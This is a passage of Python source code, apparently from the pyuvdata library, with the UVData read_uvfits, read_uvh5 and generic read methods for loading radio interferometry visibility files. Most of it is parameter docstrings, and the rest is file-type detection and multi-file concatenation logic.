nsample_array_dtype=nsample_array_dtype,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
self._convert_from_filetype(corr_obj)
del corr_obj
def read_uvfits(
self,
filename,
axis=None,
antenna_nums=None,
antenna_names=None,
ant_str=None,
bls=None,
frequencies=None,
freq_chans=None,
times=None,
time_range=None,
lsts=None,
lst_range=None,
polarizations=None,
blt_inds=None,
keep_all_metadata=True,
read_data=True,
background_lsts=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
fix_old_proj=None,
fix_use_ant_pos=True,
):
"""
Read in header, metadata and data from a single uvfits file.
Parameters
----------
filename : str
The uvfits file to read from.
axis : str
Axis to concatenate files along. This enables fast concatenation
along the specified axis without the normal checking that all other
metadata agrees. This method does not guarantee correct resulting
objects. Please see the docstring for fast_concat for details.
Allowed values are: 'blt', 'freq', 'polarization'. Only used if
multiple files are passed.
antenna_nums : array_like of int, optional
The antennas numbers to include when reading data into the object
(antenna positions and names for the removed antennas will be retained
unless `keep_all_metadata` is False). This cannot be provided if
`antenna_names` is also provided. Ignored if read_data is False.
antenna_names : array_like of str, optional
The antennas names to include when reading data into the object
(antenna positions and names for the removed antennas will be retained
unless `keep_all_metadata` is False). This cannot be provided if
`antenna_nums` is also provided. Ignored if read_data is False.
bls : list of tuple, optional
A list of antenna number tuples (e.g. [(0, 1), (3, 2)]) or a list of
baseline 3-tuples (e.g. [(0, 1, 'xx'), (2, 3, 'yy')]) specifying baselines
to include when reading data into the object. For length-2 tuples,
the ordering of the numbers within the tuple does not matter. For
length-3 tuples, the polarization string is in the order of the two
antennas. If length-3 tuples are provided, `polarizations` must be
None. Ignored if read_data is False.
ant_str : str, optional
A string containing information about what antenna numbers
and polarizations to include when reading data into the object.
Can be 'auto', 'cross', 'all', or combinations of antenna numbers
and polarizations (e.g. '1', '1_2', '1x_2y'). See tutorial for more
examples of valid strings and the behavior of different forms for ant_str.
If '1x_2y,2y_3y' is passed, both polarizations 'xy' and 'yy' will
be kept for both baselines (1, 2) and (2, 3) to return a valid
pyuvdata object.
An ant_str cannot be passed in addition to any of `antenna_nums`,
`antenna_names`, `bls` args or the `polarizations` parameters,
if it is a ValueError will be raised. Ignored if read_data is False.
frequencies : array_like of float, optional
The frequencies to include when reading data into the object, each
value passed here should exist in the freq_array. Ignored if
read_data is False.
freq_chans : array_like of int, optional
The frequency channel numbers to include when reading data into the
object. Ignored if read_data is False.
times : array_like of float, optional
The times to include when reading data into the object, each value
passed here should exist in the time_array in the file.
Cannot be used with `time_range`.
time_range : array_like of float, optional
The time range in Julian Date to include when reading data into
the object, must be length 2. Some of the times in the file should
fall between the first and last elements.
Cannot be used with `times`.
lsts : array_like of float, optional
The local sidereal times (LSTs) to keep in the object, each value
passed here should exist in the lst_array. Cannot be used with
`times`, `time_range`, or `lst_range`.
lst_range : array_like of float, optional
The local sidereal time (LST) range in radians to keep in the
object, must be of length 2. Some of the LSTs in the object should
fall between the first and last elements. If the second value is
smaller than the first, the LSTs are treated as having phase-wrapped
around LST = 2*pi = 0, and the LSTs kept on the object will run from
the larger value, through 0, and end at the smaller value.
polarizations : array_like of int, optional
The polarizations numbers to include when reading data into the
object, each value passed here should exist in the polarization_array.
Ignored if read_data is False.
blt_inds : array_like of int, optional
The baseline-time indices to include when reading data into the
object. This is not commonly used. Ignored if read_data is False.
keep_all_metadata : bool
Option to keep all the metadata associated with antennas, even those
that do not have data associated with them after the select option.
read_data : bool
Read in the visibility and flag data. If set to false, only the
basic header info and metadata read in. Setting read_data to False
results in a metdata only object.
background_lsts : bool
When set to True, the lst_array is calculated in a background thread.
run_check : bool
Option to check for the existence and proper shapes of parameters
after after reading in the file (the default is True,
meaning the check will be run). Ignored if read_data is False.
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
Ignored if read_data is False.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reading in the file (the default is True, meaning the acceptable
range check will be done). Ignored if read_data is False.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
fix_old_proj : bool
Applies a fix to uvw-coordinates and phasing, assuming that the old `phase`
method was used prior to writing the data, which had errors of the order of
one part in 1e4 - 1e5. See the phasing memo for more details. Default is
False.
fix_use_ant_pos : bool
If setting `fix_old_proj` to True, use the antenna positions to derive the
correct uvw-coordinates rather than using the baseline vectors. Default is
True.
Raises
------
IOError
If filename doesn't exist.
ValueError
If incompatible select keywords are set (e.g. `ant_str` with other
antenna selectors, `times` and `time_range`) or select keywords
exclude all data or if keywords are set to the wrong type.
If the data are multi source or have multiple
spectral windows.
If the metadata are not internally consistent or missing.
"""
from . import uvfits
if isinstance(filename, (list, tuple, np.ndarray)):
raise ValueError(
"Reading multiple files from class specific "
"read functions is no longer supported. "
"Use the generic `uvdata.read` function instead."
)
uvfits_obj = uvfits.UVFITS()
uvfits_obj.read_uvfits(
filename,
antenna_nums=antenna_nums,
antenna_names=antenna_names,
ant_str=ant_str,
bls=bls,
frequencies=frequencies,
freq_chans=freq_chans,
times=times,
time_range=time_range,
lsts=lsts,
lst_range=lst_range,
polarizations=polarizations,
blt_inds=blt_inds,
keep_all_metadata=keep_all_metadata,
read_data=read_data,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
fix_old_proj=fix_old_proj,
fix_use_ant_pos=fix_use_ant_pos,
)
self._convert_from_filetype(uvfits_obj)
del uvfits_obj
def read_uvh5(
self,
filename,
axis=None,
antenna_nums=None,
antenna_names=None,
ant_str=None,
bls=None,
frequencies=None,
freq_chans=None,
times=None,
time_range=None,
lsts=None,
lst_range=None,
polarizations=None,
blt_inds=None,
keep_all_metadata=True,
read_data=True,
data_array_dtype=np.complex128,
multidim_index=False,
background_lsts=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
fix_old_proj=None,
fix_use_ant_pos=True,
):
"""
Read a UVH5 file.
Parameters
----------
filename : str
The UVH5 file to read from.
axis : str
Axis to concatenate files along. This enables fast concatenation
along the specified axis without the normal checking that all other
metadata agrees. This method does not guarantee correct resulting
objects. Please see the docstring for fast_concat for details.
Allowed values are: 'blt', 'freq', 'polarization'. Only used if
multiple files are passed.
antenna_nums : array_like of int, optional
The antennas numbers to include when reading data into the object
(antenna positions and names for the removed antennas will be retained
unless `keep_all_metadata` is False). This cannot be provided if
`antenna_names` is also provided. Ignored if read_data is False.
antenna_names : array_like of str, optional
The antennas names to include when reading data into the object
(antenna positions and names for the removed antennas will be retained
unless `keep_all_metadata` is False). This cannot be provided if
`antenna_nums` is also provided. Ignored if read_data is False.
bls : list of tuple, optional
A list of antenna number tuples (e.g. [(0, 1), (3, 2)]) or a list of
baseline 3-tuples (e.g. [(0, 1, 'xx'), (2, 3, 'yy')]) specifying baselines
to include when reading data into the object. For length-2 tuples,
the ordering of the numbers within the tuple does not matter. For
length-3 tuples, the polarization string is in the order of the two
antennas. If length-3 tuples are provided, `polarizations` must be
None. Ignored if read_data is False.
ant_str : str, optional
A string containing information about what antenna numbers
and polarizations to include when reading data into the object.
Can be 'auto', 'cross', 'all', or combinations of antenna numbers
and polarizations (e.g. '1', '1_2', '1x_2y'). See tutorial for more
examples of valid strings and the behavior of different forms for ant_str.
If '1x_2y,2y_3y' is passed, both polarizations 'xy' and 'yy' will
be kept for both baselines (1, 2) and (2, 3) to return a valid
pyuvdata object.
An ant_str cannot be passed in addition to any of `antenna_nums`,
`antenna_names`, `bls` args or the `polarizations` parameters,
if it is a ValueError will be raised. Ignored if read_data is False.
frequencies : array_like of float, optional
The frequencies to include when reading data into the object, each
value passed here should exist in the freq_array. Ignored if
read_data is False.
freq_chans : array_like of int, optional
The frequency channel numbers to include when reading data into the
object. Ignored if read_data is False.
times : array_like of float, optional
The times to include when reading data into the object, each value
passed here should exist in the time_array in the file.
Cannot be used with `time_range`.
time_range : array_like of float, optional
The time range in Julian Date to include when reading data into
the object, must be length 2. Some of the times in the file should
fall between the first and last elements.
Cannot be used with `times`.
lsts : array_like of float, optional
The local sidereal times (LSTs) to keep in the object, each value
passed here should exist in the lst_array. Cannot be used with
`times`, `time_range`, or `lst_range`.
lst_range : array_like of float, optional
The local sidereal time (LST) range in radians to keep in the
object, must be of length 2. Some of the LSTs in the object should
fall between the first and last elements. If the second value is
smaller than the first, the LSTs are treated as having phase-wrapped
around LST = 2*pi = 0, and the LSTs kept on the object will run from
the larger value, through 0, and end at the smaller value.
polarizations : array_like of int, optional
The polarizations numbers to include when reading data into the
object, each value passed here should exist in the polarization_array.
Ignored if read_data is False.
blt_inds : array_like of int, optional
The baseline-time indices to include when reading data into the
object. This is not commonly used. Ignored if read_data is False.
keep_all_metadata : bool
Option to keep all the metadata associated with antennas, even those
that do not have data associated with them after the select option.
read_data : bool
Read in the visibility and flag data. If set to false, only the
basic header info and metadata will be read in. Setting read_data to
False results in an incompletely defined object (check will not pass).
data_array_dtype : numpy dtype
Datatype to store the output data_array as. Must be either
np.complex64 (single-precision real and imaginary) or np.complex128 (double-
precision real and imaginary). Only used if the datatype of the visibility
data on-disk is not 'c8' or 'c16'.
multidim_index : bool
[Only for HDF5] If True, attempt to index the HDF5 dataset
simultaneously along all data axes. Otherwise index one axis at-a-time.
This only works if data selection is sliceable along all but one axis.
If indices are not well-matched to data chunks, this can be slow.
background_lsts : bool
When set to True, the lst_array is calculated in a background thread.
run_check : bool
Option to check for the existence and proper shapes of parameters
after after reading in the file (the default is True,
meaning the check will be run). Ignored if read_data is False.
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
Ignored if read_data is False.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reading in the file (the default is True, meaning the acceptable
range check will be done). Ignored if read_data is False.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
fix_old_proj : bool
Applies a fix to uvw-coordinates and phasing, assuming that the old `phase`
method was used prior to writing the data, which had errors of the order of
one part in 1e4 - 1e5. See the phasing memo for more details. Default is
to apply the correction if the attributes `phase_center_app_ra` and
`phase_center_app_dec` are missing (as they were introduced alongside the
new phasing method).
fix_use_ant_pos : bool
If setting `fix_old_proj` to True, use the antenna positions to derive the
correct uvw-coordinates rather than using the baseline vectors. Default is
True.
Raises
------
IOError
If filename doesn't exist.
ValueError
If the data_array_dtype is not a complex dtype.
If incompatible select keywords are set (e.g. `ant_str` with other
antenna selectors, `times` and `time_range`) or select keywords
exclude all data or if keywords are set to the wrong type.
"""
from . import uvh5
if isinstance(filename, (list, tuple, np.ndarray)):
raise ValueError(
"Reading multiple files from class specific "
"read functions is no longer supported. "
"Use the generic `uvdata.read` function instead."
)
uvh5_obj = uvh5.UVH5()
uvh5_obj.read_uvh5(
filename,
antenna_nums=antenna_nums,
antenna_names=antenna_names,
ant_str=ant_str,
bls=bls,
frequencies=frequencies,
freq_chans=freq_chans,
times=times,
time_range=time_range,
lsts=lsts,
lst_range=lst_range,
polarizations=polarizations,
blt_inds=blt_inds,
data_array_dtype=data_array_dtype,
keep_all_metadata=keep_all_metadata,
read_data=read_data,
multidim_index=multidim_index,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
fix_old_proj=fix_old_proj,
fix_use_ant_pos=fix_use_ant_pos,
)
self._convert_from_filetype(uvh5_obj)
del uvh5_obj
def read(
self,
filename,
axis=None,
file_type=None,
allow_rephase=True,
phase_center_radec=None,
unphase_to_drift=False,
phase_frame="icrs",
phase_epoch=None,
orig_phase_frame=None,
phase_use_ant_pos=True,
antenna_nums=None,
antenna_names=None,
ant_str=None,
bls=None,
frequencies=None,
freq_chans=None,
times=None,
polarizations=None,
blt_inds=None,
time_range=None,
keep_all_metadata=True,
read_data=True,
phase_type=None,
correct_lat_lon=True,
use_model=False,
data_column="DATA",
pol_order="AIPS",
data_array_dtype=np.complex128,
nsample_array_dtype=np.float32,
use_aoflagger_flags=None,
use_cotter_flags=None,
remove_dig_gains=True,
remove_coarse_band=True,
correct_cable_len=False,
correct_van_vleck=False,
cheby_approx=True,
flag_small_auto_ants=True,
flag_small_sig_ants=None,
propagate_coarse_flags=True,
flag_init=True,
edge_width=80e3,
start_flag="goodtime",
end_flag=0.0,
flag_dc_offset=True,
remove_flagged_ants=True,
phase_to_pointing_center=False,
skip_bad_files=False,
multidim_index=False,
background_lsts=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
isource=None,
irec=None,
isb=None,
corrchunk=None,
pseudo_cont=False,
lsts=None,
lst_range=None,
calc_lst=True,
fix_old_proj=None,
fix_use_ant_pos=True,
make_multi_phase=False,
ignore_name=False,
):
"""
Read a generic file into a UVData object.
Parameters
----------
filename : str or array_like of str
The file(s) or list(s) (or array(s)) of files to read from.
file_type : str
One of ['uvfits', 'miriad', 'fhd', 'ms', 'uvh5'] or None.
If None, the code attempts to guess what the file type is.
For miriad and ms types, this is based on the standard directory
structure. For FHD, uvfits and uvh5 files it's based on file
extensions (FHD: .sav, .txt; uvfits: .uvfits; uvh5: .uvh5).
Note that if a list of datasets is passed, the file type is
determined from the first dataset.
axis : str
Axis to concatenate files along. This enables fast concatenation
along the specified axis without the normal checking that all other
metadata agrees. This method does not guarantee correct resulting
objects. Please see the docstring for fast_concat for details.
Allowed values are: 'blt', 'freq', 'polarization'. Only used if
multiple files are passed.
allow_rephase : bool
Allow rephasing of phased file data so that data from files with
different phasing can be combined.
phase_center_radec : array_like of float
The phase center to phase the files to before adding the objects in
radians (in the ICRS frame). If set to None and multiple files are
read with different phase centers, the phase center of the first
file will be used.
unphase_to_drift : bool
Unphase the data from the files before combining them.
phase_frame : str
The astropy frame to phase to. Either 'icrs' or 'gcrs'.
'gcrs' accounts for precession & nutation,
'icrs' accounts for precession, nutation & abberation.
Only used if `phase_center_radec` is set.
orig_phase_frame : str
The original phase frame of the data (if it is already phased). Used
for unphasing, only if `unphase_to_drift` or `phase_center_radec`
are set. Defaults to using the 'phase_center_frame' attribute or
'icrs' if that attribute is None.
phase_use_ant_pos : bool
If True, calculate the phased or unphased uvws directly from the
antenna positions rather than from the existing uvws.
Only used if `unphase_to_drift` or `phase_center_radec` are set.
antenna_nums : array_like of int, optional
The antennas numbers to include when reading data into the object
(antenna positions and names for the removed antennas will be retained
unless `keep_all_metadata` is False). This cannot be provided if
`antenna_names` is also provided.
antenna_names : array_like of str, optional
The antennas names to include when reading data into the object
(antenna positions and names for the removed antennas will be retained
unless `keep_all_metadata` is False). This cannot be provided if
`antenna_nums` is also provided.
bls : list of tuple, optional
A list of antenna number tuples (e.g. [(0, 1), (3, 2)]) or a list of
baseline 3-tuples (e.g. [(0, 1, 'xx'), (2, 3, 'yy')]) specifying baselines
to include when reading data into the object. For length-2 tuples,
the ordering of the numbers within the tuple does not matter. For
length-3 tuples, the polarization string is in the order of the two
antennas. If length-3 tuples are provided, `polarizations` must be
None.
ant_str : str, optional
A string containing information about what antenna numbers
and polarizations to include when reading data into the object.
Can be 'auto', 'cross', 'all', or combinations of antenna numbers
and polarizations (e.g. '1', '1_2', '1x_2y'). See tutorial for more
examples of valid strings and the behavior of different forms for ant_str.
If '1x_2y,2y_3y' is passed, both polarizations 'xy' and 'yy' will
be kept for both baselines (1, 2) and (2, 3) to return a valid
pyuvdata object.
An ant_str cannot be passed in addition to any of `antenna_nums`,
`antenna_names`, `bls` args or the `polarizations` parameters,
if it is a ValueError will be raised.
frequencies : array_like of float, optional
The frequencies to include when reading data into the object, each
value passed here should exist in the freq_array.
freq_chans : array_like of int, optional
The frequency channel numbers to include when reading data into the
object. Ignored if read_data is False.
times : array_like of float, optional
The times to include when reading data into the object, each value
passed here should exist in the time_array in the file.
Cannot be used with `time_range`.
time_range : array_like of float, optional
The time range in Julian Date to include when reading data into
the object, must be length 2. Some of the times in the file should
fall between the first and last elements.
Cannot be used with `times`.
polarizations : array_like of int, optional
The polarizations numbers to include when reading data into the
object, each value passed here should exist in the polarization_array.
blt_inds : array_like of int, optional
The baseline-time indices to include when reading data into the
object. This is not commonly used.
keep_all_metadata : bool
Option to keep all the metadata associated with antennas, even those
that do not have data associated with them after the select option.
read_data : bool
Read in the data. Only used if file_type is 'uvfits',
'miriad' or 'uvh5'. If set to False, only the metadata will be
read in. Setting read_data to False results in a metdata only
object.
phase_type : str, optional
Option to specify the phasing status of the data. Only used if
file_type is 'miriad'. Options are 'drift', 'phased' or None.
'drift' means the data are zenith drift data, 'phased' means the
data are phased to a single RA/Dec. Default is None
meaning it will be guessed at based on the file contents.
correct_lat_lon : bool
Option to update the latitude and longitude from the known_telescopes
list if the altitude is missing. Only used if file_type is 'miriad'.
use_model : bool
Option to read in the model visibilities rather than the dirty
visibilities (the default is False, meaning the dirty visibilities
will be read). Only used if file_type is 'fhd'.
data_column : str
name of CASA data column to read into data_array. Options are:
'DATA', 'MODEL', or 'CORRECTED_DATA'. Only used if file_type is 'ms'.
pol_order : str
Option to specify polarizations order convention, options are
'CASA' or 'AIPS'. Only used if file_type is 'ms'.
data_array_dtype : numpy dtype
Datatype to store the output data_array as. Must be either
np.complex64 (single-precision real and imaginary) or np.complex128 (double-
precision real and imaginary). Only used if the datatype of the visibility
data on-disk is not 'c8' or 'c16'. Only used if file_type is 'uvh5' or
'mwa_corr_fits'.
nsample_array_dtype : numpy dtype
Datatype to store the output nsample_array as. Must be either
np.float64 (double-precision), np.float32 (single-precision), or
np.float16 (half-precision). Half-precision is only recommended for
cases where no sampling or averaging of baselines will occur,
because round-off errors can be quite large (~1e-3). Only used if
file_type is 'mwa_corr_fits'.
use_aoflagger_flags : bool
Option to use aoflagger mwaf flag files. Defaults to true if aoflagger
flag files are submitted.
use_cotter_flags : bool
Being replaced by use_aoflagger_flags and will be removed in v2.4.
remove_dig_gains : bool
Only used if file_type is 'mwa_corr_fits'. Option to divide out digital
gains.
remove_coarse_band : bool
Only used if file_type is 'mwa_corr_fits'. Option to divide out coarse
band shape.
correct_cable_len : bool
Flag to apply cable length correction. Only used if file_type is
'mwa_corr_fits'.
correct_van_vleck : bool
Flag to apply a van vleck correction. Only used if file_type is
'mwa_corr_fits'.
cheby_approx : bool
Only used if file_type is 'mwa_corr_fits' and correct_van_vleck is True.
Option to implement the van vleck correction with a chebyshev polynomial
approximation. Set to False to run the integral version of the correction.
flag_small_auto_ants : bool
Only used if correct_van_vleck is True. Option to completely flag any
antenna for which the autocorrelation falls below a threshold found by
the Van Vleck correction to indicate bad data. Specifically, the
threshold used is 0.5 * integration_time * channel_width. If set to False,
only the times and frequencies at which the auto is below the
threshold will be flagged for the antenna. Only used if file_type is
'mwa_corr_fits'.
flag_small_sig_ants : bool
Being replaced by flag_small_auto_ants and will be removed in v2.4.
propogate_coarse_flags : bool
Option to propogate flags for missing coarse channel integrations
across frequency. Only used if file_type is 'mwa_corr_fits'.
flag_init: bool
Only used if file_type is 'mwa_corr_fits'. Set to True in order to
do routine flagging of coarse channel edges, start or end
integrations, or the center fine channel of each coarse
channel. See associated keywords.
edge_width: float
Only used if file_type is 'mwa_corr_fits' and flag_init is True. Set
to the width to flag on the edge of each coarse channel, in hz.
Errors if not equal to integer multiple of channel_width. Set to 0
for no edge flagging.
start_flag: float or str
Only used if flag_init is True. The number of seconds to flag at the
beginning of the observation. Set to 0 for no flagging. Default is
'goodtime', which uses information in the metafits file to determine
the length of time that should be flagged. Errors if input is not a
float or 'goodtime'. Errors if float input is not equal to an
integer multiple of the integration time.
end_flag: floats
Only used if file_type is 'mwa_corr_fits' and flag_init is True. Set
to the number of seconds to flag at the end of the observation. Set
to 0 for no flagging. Errors if not an integer multiple of the
integration time.
flag_dc_offset: bool
Only used if file_type is 'mwa_corr_fits' and flag_init is True. Set
to True to flag the center fine channel of each coarse channel. Only
used if file_type is 'mwa_corr_fits'.
remove_flagged_ants : bool
Option to perform a select to remove antennas flagged in the metafits
file. If correct_van_vleck and flag_small_auto_ants are both True then
antennas flagged by the Van Vleck correction are also removed.
Only used if file_type is 'mwa_corr_fits'.
phase_to_pointing_center : bool
Flag to phase to the pointing center. Only used if file_type is
'mwa_corr_fits'. Cannot be set if phase_center_radec is not None.
skip_bad_files : bool
Option when reading multiple files to catch read errors such that
the read continues even if one or more files are corrupted. Files
that produce errors will be printed. Default is False (files will
not be skipped).
multidim_index : bool
[Only for HDF5] If True, attempt to index the HDF5 dataset
simultaneously along all data axes. Otherwise index one axis at-a-time.
This only works if data selection is sliceable along all but one axis.
If indices are not well-matched to data chunks, this can be slow.
background_lsts : bool
When set to True, the lst_array is calculated in a background thread.
run_check : bool
Option to check for the existence and proper shapes of parameters
after after reading in the file (the default is True,
meaning the check will be run). Ignored if read_data is False.
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
Ignored if read_data is False.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reading in the file (the default is True, meaning the acceptable
range check will be done). Ignored if read_data is False.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
isource : int
Source code for MIR dataset
irec : int
Receiver code for MIR dataset
isb : int
Sideband code for MIR dataset
corrchunk : int
Correlator chunk code for MIR dataset
pseudo_cont : boolean
Read in only pseudo-continuuum values in MIR dataset. Default is false.
lsts : array_like of float, optional
The local sidereal times (LSTs) to keep in the object, each value
passed here should exist in the lst_array. Cannot be used with
`times`, `time_range`, or `lst_range`.
lst_range : array_like of float, optional
The local sidereal time (LST) range in radians to keep in the
object, must be of length 2. Some of the LSTs in the object should
fall between the first and last elements. If the second value is
smaller than the first, the LSTs are treated as having phase-wrapped
around LST = 2*pi = 0, and the LSTs kept on the object will run from
the larger value, through 0, and end at the smaller value.
calc_lst : bool
Recalculate the LST values that are present within the file, useful in
cases where the "online" calculate values have precision or value errors.
Default is True. Only applies to MIRIAD files.
fix_old_proj : bool
Applies a fix to uvw-coordinates and phasing, assuming that the old `phase`
method was used prior to writing the data, which had errors of the order of
one part in 1e4 - 1e5. See the phasing memo for more details. Default is
False, unless reading a UVH5 file that is missing the `phase_center_app_ra`
and `phase_center_app_dec` attributes (as these were introduced at the same
time as the new `phase` method), in which case the default is True.
fix_use_ant_pos : bool
If setting `fix_old_proj` to True, use the antenna positions to derive the
correct uvw-coordinates rather than using the baseline vectors. Default is
True.
make_multi_phase : bool
Option to make the output a multi phase center dataset, capable of holding
data on multiple phase centers. By default, this is only done if reading
in a file with multiple sources.
ignore_name : bool
Only relevant when reading in multiple files, which are concatenated into a
single UVData object. Option to ignore the name of the phase center when
combining multiple files, which would otherwise result in an error being
raised because of attributes not matching. Doing so effectively adopts the
name found in the first file read in. Default is False.
Raises
------
ValueError
If the file_type is not set and cannot be determined from the file name.
If incompatible select keywords are set (e.g. `ant_str` with other
antenna selectors, `times` and `time_range`) or select keywords
exclude all data or if keywords are set to the wrong type.
If the data are multi source or have multiple
spectral windows.
If phase_center_radec is not None and is not length 2.
"""
if isinstance(filename, (list, tuple, np.ndarray)):
# this is either a list of separate files to read or a list of
# FHD files or MWA correlator FITS files
if isinstance(filename[0], (list, tuple, np.ndarray)):
if file_type is None:
# this must be a list of lists of FHD or MWA correlator FITS
basename, extension = os.path.splitext(filename[0][0])
if extension == ".sav" or extension == ".txt":
file_type = "fhd"
elif (
extension == ".fits"
or extension == ".metafits"
or extension == ".mwaf"
):
file_type = "mwa_corr_fits"
multi = True
else:
if file_type is None:
basename, extension = os.path.splitext(filename[0])
if extension == ".sav" or extension == ".txt":
file_type = "fhd"
elif (
extension == ".fits"
or extension == ".metafits"
or extension == ".mwaf"
):
file_type = "mwa_corr_fits"
if file_type == "fhd" or file_type == "mwa_corr_fits":
multi = False
else:
multi = True
else:
multi = False
if file_type is None:
if multi:
file_test = filename[0]
else:
file_test = filename
if os.path.isdir(file_test):
# it's a directory, so it's either miriad, mir, or ms file type
if os.path.exists(os.path.join(file_test, "vartable")):
# It's miriad.
file_type = "miriad"
elif os.path.exists(os.path.join(file_test, "OBSERVATION")):
# It's a measurement set.
file_type = "ms"
elif os.path.exists(os.path.join(file_test, "sch_read")):
# It's Submillimeter Array mir format.
file_type = "mir"
else:
basename, extension = os.path.splitext(file_test)
if extension == ".uvfits":
file_type = "uvfits"
elif extension == ".uvh5":
file_type = "uvh5"
if file_type is None:
raise ValueError(
"File type could not be determined, use the "
"file_type keyword to specify the type."
)
if time_range is not None:
if times is not None:
raise ValueError("Only one of times and time_range can be provided.")
if antenna_names is not None and antenna_nums is not None:
raise ValueError(
"Only one of antenna_nums and antenna_names can " "be provided."
)
if multi:
file_num = 0
file_warnings = ""
unread = True
f = filename[file_num]
while unread and file_num < len(filename):
try:
self.read(
filename[file_num],
file_type=file_type,
antenna_nums=antenna_nums,
antenna_names=antenna_names,
ant_str=ant_str,
bls=bls,
frequencies=frequencies,
freq_chans=freq_chans,
times=times,
polarizations=polarizations,
blt_inds=blt_inds,
time_range=time_range,
keep_all_metadata=keep_all_metadata,
read_data=read_data,
phase_type=phase_type,
correct_lat_lon=correct_lat_lon,
use_model=use_model,
data_column=data_column,
pol_order=pol_order,
data_array_dtype=data_array_dtype,
nsample_array_dtype=nsample_array_dtype,
skip_bad_files=skip_bad_files,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
isource=None,
irec=irec,
isb=isb,
corrchunk=corrchunk,
pseudo_cont=pseudo_cont,
calc_lst=calc_lst,
fix_old_proj=fix_old_proj,
fix_use_ant_pos=fix_use_ant_pos,
make_multi_phase=make_multi_phase,
)
unread = False
except KeyError as err:
file_warnings = (
file_warnings + f"Failed to read {f} due to KeyError: {err}\n"
)
file_num += 1
if skip_bad_files is False:
raise
except ValueError as err:
file_warnings = (
file_warnings + f"Failed to read {f} due to ValueError: {err}\n"
)
file_num += 1
if skip_bad_files is False:
raise
except OSError as err: # pragma: nocover
file_warnings = (
file_warnings + f"Failed to read {f} due to OSError: {err}\n"
)
file_num += 1
if skip_bad_files is False:
raise
if (
allow_rephase
and phase_center_radec is None
and not unphase_to_drift
and self.phase_type == "phased"
and not self.multi_phase_center
and not make_multi_phase
):
# set the phase center to be the phase center of the first file
phase_center_radec = [self.phase_center_ra, self.phase_center_dec]
phase_frame = self.phase_center_frame
phase_epoch = self.phase_center_epoch
uv_list = []
if len(filename) > file_num + 1:
for f in filename[file_num + 1 :]:
uv2 = UVData()
try:
uv2.read(
f,
file_type=file_type,
phase_center_radec=phase_center_radec,
phase_frame=phase_frame,
phase_epoch=phase_epoch,
antenna_nums=antenna_nums,
antenna_names=antenna_names,
ant_str=ant_str,
bls=bls,
frequencies=frequencies,
freq_chans=freq_chans,
times=times,
polarizations=polarizations,
blt_inds=blt_inds,
time_range=time_range,
keep_all_metadata=keep_all_metadata,
read_data=read_data,
phase_type=phase_type,
correct_lat_lon=correct_lat_lon,
use_model=use_model,
data_column=data_column,
pol_order=pol_order,
data_array_dtype=data_array_dtype,
nsample_array_dtype=nsample_array_dtype,
skip_bad_files=skip_bad_files,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
isource=None,
irec=irec,
isb=isb,
corrchunk=corrchunk,
pseudo_cont=pseudo_cont,
calc_lst=calc_lst,
fix_old_proj=fix_old_proj,
fix_use_ant_pos=fix_use_ant_pos,
make_multi_phase=make_multi_phase,
)
uv_list.append(uv2)
except KeyError as err:
file_warnings = (
file_warnings
+ f"Failed to read {f} due to KeyError: {err}\n"
)
if skip_bad_files:
continue
else:
raise
except ValueError as err:
file_warnings = (
file_warnings
+ f"Failed to read {f} due to ValueError: {err}\n"
)
if skip_bad_files:
continue
else:
raise
except OSError as err: # pragma: nocover
file_warnings = (
file_warnings
+ f"Failed to read {f} due to OSError: {err}\n"
)
if skip_bad_files:
continue
else:
raise
if unread is True:
warnings.warn(
"########################################################\n"
"ALL FILES FAILED ON READ - NO READABLE FILES IN FILENAME\n"
"########################################################"
)
elif len(file_warnings) > 0:
warnings.warn(file_warnings)
# Concatenate once at end
if axis is not None:
# Rewrote fast_concat to operate on lists
self.fast_concat(
uv_list,
axis,
phase_center_radec=phase_center_radec,
unphase_to_drift=unphase_to_drift,
phase_frame=phase_frame,
orig_phase_frame=orig_phase_frame,
use_ant_pos=phase_use_ant_pos,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
inplace=True,
ignore_name=ignore_name,
)
else:
# Too much work to rewrite __add__ to operate on lists
# of files, so instead doing a binary tree merge
uv_list = [self] + uv_list
while len(uv_list) > 1:
for uv1, uv2 in zip(uv_list[0::2], uv_list[1::2]):
uv1.__iadd__(
uv2,
phase_center_radec=phase_center_radec,
unphase_to_drift=unphase_to_drift,
phase_frame=phase_frame,
orig_phase_frame=orig_phase_frame,
use_ant_pos=phase_use_ant_pos,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
ignore_name=ignore_name,
)
uv_list = uv_list[0::2]
# Because self was at the beginning of the list,
# everything is merged into it at the end of this loop
else:
if file_type in ["fhd", "ms", "mwa_corr_fits"]:
if (
antenna_nums is not None
or antenna_names is not None
or ant_str is not None
or bls is not None
or frequencies is not None
or freq_chans is not None
or times is not None
or time_range is not None
or polarizations is not None
or blt_inds is not None
):
select = True
warnings.warn(
"Warning: select on read keyword set, but "
'file_type is "{ftype}" which does not support select '
